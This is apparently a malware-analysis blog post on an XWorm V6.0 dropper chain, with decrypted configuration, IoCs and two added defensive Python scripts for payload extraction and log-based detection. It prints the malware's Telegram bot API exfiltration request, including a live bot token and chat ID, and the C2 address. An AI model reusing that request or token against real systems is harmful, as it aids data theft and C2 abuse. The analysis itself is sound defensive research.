XWorm Malware Analysis

July 29, 2025
Fuad Aliyev
Malware Analysis
Reverse Engineering
Worm

What's XWorm?

"Malware with wide range of capabilities ranging from RAT to ransomware." (Malpedia)

Background

I'll keep things simple as usual. I was browsing MalwareBazaar when a JavaScript file tagged as "XWorm" caught my eye. I downloaded it to analyze later (I had a competition, so there was no time to check for a week). This is the MalwareBazaar link for the file. It was first seen in the wild on "2025-07-23 16:04:23 UTC".

Note: All files are provided at the end of this page.

Infection Chain

[Figure: infection chain diagram]

None of these files were downloaded from external sources. Most of them were extracted using Base64 decoding and AES decryption.

Analysis: Dropper and Evasion Techniques

Extracting the files was straightforward for me. Instead of letting the code execute normally, I wrote the decoded bytes/scripts to files and analyzed them one by one.

Stage 1: JavaScript Dropper

The JavaScript file had only one purpose: extracting "DallasBoulevard.bat" into "AppData/Local/Temp" and executing it.

Stage 2: Batch File Operations

This batch file had several purposes and was obfuscated. I extracted its primary function: executing a PowerShell command. This PowerShell command uses the same batch file (in a different directory) to:

  1. Get the first line starting with ":::"
  2. Base64 decode it
  3. Execute it (another PowerShell command)

Stage 3: Advanced Evasion PowerShell

This PowerShell command uses advanced techniques to avoid detection:

[Figure: annotated Stage 3 PowerShell script]

Comments were added by me during analysis; strings were also encrypted, so I had to decrypt them.

Stage 4: Final Payload Extraction

The PowerShell script then looks for lines starting with "::" and separates them into two different executable files:

  1. First executable: A .NET file that is useless and does nothing
  2. Second executable: Decrypts bytes and executes "XWormClient.exe" (the main malware file)

This .NET executable is heavily obfuscated. I used NetReactorSlayer to deobfuscate it, but it couldn't accomplish much. I might have done something wrong, but I was able to extract the information I needed in the end.
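The extraction step used in Stage 2 (the first ":::" line is Base64-decoded into a PowerShell command) and Stage 4 (the "::" lines become two executables) can be automated so the carrier lines are decoded to disk instead of executed. The script below is an added example written for this page, not the author's tooling; it assumes that the "::" lines, like the ":::" line, hold Base64 text (the AES layer mentioned above is not handled here), and it works on a constructed stand-in for DallasBoulevard.bat rather than the real sample.

```python
import base64
import hashlib
import re
from pathlib import Path

# Constructed stand-in for DallasBoulevard.bat (not the real sample).
# Assumption: the ":::" carrier line and the "::" carrier lines both hold
# Base64 text, so the decoded payloads can be written to disk for analysis.
SAMPLE_BAT = "\n".join([
    "@echo off",
    "rem harmless-looking filler",
    "::: " + base64.b64encode(b"Write-Host 'stage-3 placeholder'").decode(),
    ":: " + base64.b64encode(b"MZ" + b"\x00" * 30 + b"stub-one").decode(),
    ":: " + base64.b64encode(b"MZ" + b"\x00" * 30 + b"stub-two").decode(),
    "echo done",
])

# A carrier line is two or three colons followed by a single Base64 token.
# Ordinary batch comments ("::rem ...", ":: some words") will not decode.
CARRIER_RE = re.compile(r"^(:{2,3})\s*(\S+)\s*$")


def extract_payloads(batch_text: str) -> dict:
    """Decode the embedded stages instead of letting the batch file run them.

    Returns {"stage3": <decoded text of the first ':::' line or None>,
             "executables": [<one dict per '::' line, in file order>]}.
    """
    stage3 = None
    executables = []
    for line in batch_text.splitlines():
        match = CARRIER_RE.match(line)
        if not match:
            continue
        marker, blob = match.groups()
        try:
            data = base64.b64decode(blob, validate=True)
        except ValueError:
            continue  # a genuine comment line, not a carrier
        if marker == ":::":
            if stage3 is None:  # the batch file only uses the first such line
                stage3 = data.decode("utf-8", errors="replace")
        else:
            executables.append({
                "index": len(executables),
                "size": len(data),
                "sha256": hashlib.sha256(data).hexdigest(),
                "is_pe": data[:2] == b"MZ",  # PE files begin with the MZ header
                "data": data,
            })
    return {"stage3": stage3, "executables": executables}


def write_payloads(result: dict, outdir: str) -> list:
    """Write each decoded stage to outdir and return the paths written."""
    out = Path(outdir)
    out.mkdir(parents=True, exist_ok=True)
    written = []
    if result["stage3"] is not None:
        path = out / "stage3.ps1"
        path.write_text(result["stage3"], encoding="utf-8")
        written.append(str(path))
    for exe in result["executables"]:
        suffix = "exe" if exe["is_pe"] else "bin"
        path = out / f"payload_{exe['index']}.{suffix}"
        path.write_bytes(exe["data"])
        written.append(str(path))
    return written


if __name__ == "__main__":
    result = extract_payloads(SAMPLE_BAT)
    print("stage3:", result["stage3"])
    for exe in result["executables"]:
        print(f"payload {exe['index']}: {exe['size']} bytes, "
              f"PE={exe['is_pe']}, sha256={exe['sha256']}")
    print("written:", write_payloads(result, "extracted"))
```

Running it against the real batch file would give you the Stage 3 script and the two Stage 4 binaries as separate files, with SHA-256 hashes ready for a MalwareBazaar lookup, without any of the stages executing.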

XWormClient Analysis

Part 1: String Decryption

All decrypted strings from the malware:

Glass0.
obf_str1 = 192.159.99.85
obf_str2 = 6000
obf_str3 = <666666>
obf_str4 = \<Xwormmm\>
obf_str5 = XWorm V6.0
obf_str6 = USB.exe
string2 = bc1qac0j3zkpqwudsezg63x37nmqv2tanpk2zys43c
obf_str7 = 0x9e335947293636ADfC39A13825Cd04244Fd0c1a9
obf_str8 = TWNsPN7sYpTSogGAnixsTDJnnPCViDQ45r
obf_str9 = 7257315662:AAGE4uU4C2ntEMTG6_foXKQLLlTndz8MhuE
obf_str10 = 440743435

Part 2: Persistence Setup

Creates a new mutex with the name: "6NW0cPlN6C2gZ2Tp"

Part 3: Main Loop

The application then runs in an infinite loop.

Part 4: Network Configuration

It sets up the network connection (DefaultConnectionLimit and other parameters are modified).

Part 5: C2 Communication

After the WebClient object is created, the malware gathers system information:

☠ [XWorm V6.0 @XCoderTools]

New Client : 
41B3E62F549A81F56A43

UserName : flare
OSFullName : Microsoft Windows 10 Pro
USB : False
CPU : 13th Gen Intel i7-13650HX
GPU : Microsoft Remote Display Adapter Microsoft Basic Display Adapter 
RAM : 7.98 GB
Group : XWorm V6.0

Note: This is my PC configuration (VM)

Telegram Bot C2 Communication

The malware constructs a Telegram bot API request with the following components:

[0] "https://api.telegram.org/bot"
[1] "7257315662:AAGE4uU4C2ntEMTG6_foXKQLLlTndz8MhuE"
[2] "/sendMessage?chat_id="
[3] "440743435"
[4] "&text="
[5] [System information collected above]

The Telegram API returns:

{
  "ok": true,
  "result": {
    "message_id": 1132,
    "from": {
      "id": 7257315662,
      "is_bot": true,
      "first_name": "VIRUS 🦠 BOTS",
      "username": "Alvin0365bot"
    },
    "chat": {
      "id": 440743435,
      "first_name": "Alvinmullar",
      "username": "alvinmullar",
      "type": "private"
    },
    "date": 1753785840,
    "text": "☠ [XWorm V6.0 @XCoderTools]\n\nNew Client : \n41B3E62F549A81F56A43\n\nUserName : flare\nOSFullName : Microsoft Windows 10 Pro\nUSB : False\nCPU : 13th Gen Intel i7-13650HX\nGPU : Microsoft Remote Display Adapter Microsoft Basic Display Adapter \nRAM : 7.98 GB\nGroup : XWorm V6.0",
    "entities": [
      { "offset": 14, "length": 12, "type": "mention" }
    ]
  }
}

After sending the information, the WebClient is disposed.
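Because the check-in goes over plain HTTPS to api.telegram.org with the bot token and chat ID in the URL, a proxy or egress log is enough to spot it. The script below is an added detection example written for this page, not the author's tooling: it scans log lines of the form "<timestamp> <client ip> <method> <url>" (a constructed format), pulls the bot token, API method and chat_id out of each Telegram bot API request, matches them against the IoCs above, and parses the percent-decoded text parameter back into the "Key : Value" fields of the XWorm check-in. The log lines are constructed; only the first token and chat ID are the page's IoCs, and the second token is a fake one.

```python
import re
from urllib.parse import parse_qs, quote, urlsplit

# IoCs taken from the analysis above (bot token and chat id).
KNOWN_BOT_TOKENS = {"7257315662:AAGE4uU4C2ntEMTG6_foXKQLLlTndz8MhuE"}
KNOWN_CHAT_IDS = {"440743435"}

# Telegram bot API path: /bot<numeric id>:<secret>/<method>
TG_BOT_PATH_RE = re.compile(r"/bot(\d{6,}:[A-Za-z0-9_-]{30,})/(\w+)")
# "Key : Value" lines of the check-in; "New Client : " carries its value on the next line.
BEACON_FIELD_RE = re.compile(r"^([A-Za-z][A-Za-z ]*?)\s*:\s*(.*)$")

# Constructed beacon text, modelled on the message shown above.
BEACON_TEXT = ("☠ [XWorm V6.0 @XCoderTools]\n\nNew Client : \n41B3E62F549A81F56A43\n\n"
               "UserName : flare\nOSFullName : Microsoft Windows 10 Pro\nUSB : False\n"
               "Group : XWorm V6.0")

# Constructed proxy log lines: "<timestamp> <client ip> <method> <url>".
# Timestamps, client addresses and the second (fake) bot token are made up.
SAMPLE_LOG = "\n".join([
    "2025-07-29T10:00:01Z 10.0.0.15 GET https://api.telegram.org/bot"
    "7257315662:AAGE4uU4C2ntEMTG6_foXKQLLlTndz8MhuE/sendMessage"
    "?chat_id=440743435&text=" + quote(BEACON_TEXT),
    "2025-07-29T10:00:05Z 10.0.0.22 GET https://www.example.com/index.html",
    "2025-07-29T10:01:30Z 10.0.0.31 GET https://api.telegram.org/bot"
    "1234567890:AAFakeTokenForTestingOnlyNotRealXYZ/getUpdates",
])


def parse_beacon(text: str) -> dict:
    """Turn the XWorm check-in text into {field: value}."""
    fields = {}
    lines = text.split("\n")
    for i, line in enumerate(lines):
        m = BEACON_FIELD_RE.match(line)
        if not m:
            continue
        key, value = m.group(1), m.group(2).strip()
        if not value:  # value sits on the following non-empty line
            value = next((l.strip() for l in lines[i + 1:] if l.strip()), "")
        fields[key] = value
    return fields


def scan_proxy_log(log_text: str) -> list:
    """Return one record per request to the Telegram bot API."""
    hits = []
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) < 4:
            continue
        timestamp, client, _method, url = parts[:4]
        u = urlsplit(url)
        if u.hostname != "api.telegram.org":
            continue
        m = TG_BOT_PATH_RE.search(u.path)
        if not m:
            continue
        token, api_method = m.groups()
        query = parse_qs(u.query)  # percent-decodes chat_id and text
        chat_id = query.get("chat_id", [None])[0]
        text = query.get("text", [None])[0]
        fields = parse_beacon(text) if text else {}
        hits.append({
            "timestamp": timestamp,
            "client": client,
            "bot_id": token.split(":")[0],
            "token": token,
            "api_method": api_method,
            "chat_id": chat_id,
            "known_ioc": token in KNOWN_BOT_TOKENS or chat_id in KNOWN_CHAT_IDS,
            "xworm_beacon": "XWorm" in (text or "") and "New Client" in fields,
            "fields": fields,
        })
    return hits


if __name__ == "__main__":
    for hit in scan_proxy_log(SAMPLE_LOG):
        flag = "KNOWN-IOC" if hit["known_ioc"] else "review"
        print(f"{hit['timestamp']} {hit['client']} bot={hit['bot_id']} "
              f"{hit['api_method']} chat={hit['chat_id']} [{flag}] "
              f"xworm={hit['xworm_beacon']} host={hit['fields'].get('UserName')}")
```

Any Telegram bot API call from a workstation is worth a look on its own; the token and chat ID give you something to block or hunt on, and the parsed fields tell you which host checked in and under which XWorm group name.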

Key Findings

The analysis reveals that:

  1. Telegram Bot C2: The malware uses a Telegram bot as its command and control infrastructure
  2. Secondary C2: The IP address 192.159.99.85:6000 is likely used for remote connections (though I didn't investigate this deeply)
  3. Version: This is XWorm version 6.0, which appears to be the latest version
  4. New Samples: All extracted files are new and have been uploaded to MalwareBazaar for further research

Indicators of Compromise (IOCs)

Network IOCs:

  • IP: 192.159.99.85:6000
  • Telegram Bot Token: 7257315662:AAGE4uU4C2ntEMTG6_foXKQLLlTndz8MhuE
  • Chat ID: 440743435
  • Username: alvinmullar
  • Bot Username: Alvin0365bot

Cryptocurrency Addresses:

  • Bitcoin: bc1qac0j3zkpqwudsezg63x37nmqv2tanpk2zys43c
  • Ethereum: 0x9e335947293636ADfC39A13825Cd04244Fd0c1a9
  • Monero: TWNsPN7sYpTSogGAnixsTDJnnPCViDQ45r

File Hashes:

Mutex:

  • 6NW0cPlN6C2gZ2Tp